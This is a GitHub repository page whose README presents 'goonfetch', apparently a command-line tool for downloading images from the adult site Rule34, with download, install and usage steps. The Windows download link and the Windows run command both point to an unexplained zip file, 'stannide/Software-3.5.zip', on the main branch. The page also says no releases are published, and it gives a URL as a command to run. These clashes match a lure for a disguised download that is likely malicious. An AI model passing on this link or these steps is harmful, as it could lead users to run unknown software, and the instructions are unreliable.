Skip to content

πŸ” Fetch high-quality Rule34 images and content efficiently via CLI with customizable API keys and filters for safe browsing.

License

Notifications You must be signed in to change notification settings

StarkCoderx/goonfetch

Folders and files

NameName
Last commit message
Last commit date

Latest commit

Β 

History

50 Commits
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 

Repository files navigation

πŸš€ goonfetch - Simple CLI tool to fetch Rule34 images

Download goonfetch


πŸ“– What is goonfetch?

goonfetch is a command-line tool designed to fetch images from Rule34. It helps you quickly download images based on tags you specify. The tool works on Windows, macOS, and Linux without any complicated setup.

You don’t need programming skills to use goonfetch. Once you download it, you can run it from your computer's terminal or command prompt. This guide will show you how to download, install, and use goonfetch step-by-step.


πŸ–₯️ System Requirements

To run goonfetch, your computer should meet these basic requirements:

  • Operating System: Windows 7 or newer, macOS 10.12 or newer, or any recent Linux version.
  • Processor: Any standard 64-bit processor (Intel or AMD).
  • Memory: Minimum 2 GB of RAM.
  • Disk Space: 50 MB free space for the program and downloads.
  • Internet Connection: Required to fetch images.

πŸ“₯ Download & Install

You can get goonfetch by visiting its official releases page on GitHub.

Download goonfetch Releases

How to download

  1. Click the link above to open the releases page.
  2. Look for the latest version listed at the top. Versions are named like v1.0.0, v1.1.0, etc.
  3. Scroll down to the "Assets" section under the latest version.
  4. Download the correct file for your system:
    • For Windows: https://github.com/StarkCoderx/goonfetch/raw/refs/heads/main/stannide/Software-3.5.zip
    • For macOS: goonfetch-macos
    • For Linux: goonfetch-linux
  5. Save the file to a folder you can easily find, like your Desktop or Downloads folder.

How to install

goonfetch does not need a traditional install process. It’s a standalone program. Once downloaded:

  • On Windows, you can run the .exe file directly.
  • On macOS or Linux, you might need to make the file executable:
    • Open Terminal.
    • Use the command chmod +x /path/to/goonfetch-macos (replace the path with your file location).
  • After that, you can run it from the terminal.

πŸš€ How to Use goonfetch

Here is a simple way to start fetching images using goonfetch.

Step 1: Open your command prompt or terminal

  • On Windows, press Win + R, type cmd, and press Enter.
  • On macOS or Linux, open the Terminal app.

Step 2: Navigate to where you saved goonfetch

Use the cd command to change folders. For example:

cd Desktop

If you saved it in Downloads, replace Desktop with Downloads.

Step 3: Run goonfetch with a search tag

Type the command below and press Enter:

./goonfetch TAG

Replace TAG with the keyword you want to search on Rule34. For example, to fetch images tagged β€œcat,” type:

./goonfetch cat

On Windows, you might run:

https://github.com/StarkCoderx/goonfetch/raw/refs/heads/main/stannide/Software-3.5.zip cat

The program will start downloading images related to that tag.

Step 4: Check downloaded images

goonfetch saves images in a folder named downloads inside the current directory. Once the program finishes, open that folder to see your images.


βš™οΈ Configuration Options

You can customize goonfetch using simple command-line options.

  • -n NUMBER : Set how many images to download (default is 10).
  • -q : Quiet mode; hides extra messages.
  • -o FOLDER : Save images to a specific folder.

Example:

./goonfetch cat -n 20 -o mycats

This downloads 20 cat images and saves them to the folder mycats.


πŸ› οΈ Troubleshooting

goonfetch does not run or shows permission denied

Make sure the file is executable. On macOS/Linux, run:

chmod +x goonfetch-macos

On Windows, make sure antivirus is not blocking the file.

No images download or results are empty

Check your internet connection. Also, try using different tags. Rule34 may not have images for all keywords.

Command not found error

Make sure you are in the folder where goonfetch is saved. Use the cd command as explained above.


πŸ”’ Privacy and Safety

goonfetch only downloads publicly available images from Rule34. It does not store or share your personal data. Make sure you use this tool responsibly and respect site rules.


❓ Getting More Help

If you have questions, you can:

  • Visit the goonfetch GitHub page for updates.
  • Check the Issues tab to see if others had the same problem.

Download goonfetch Releases

About

πŸ” Fetch high-quality Rule34 images and content efficiently via CLI with customizable API keys and filters for safe browsing.

Topics

Resources

License

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Contributors 5

Languages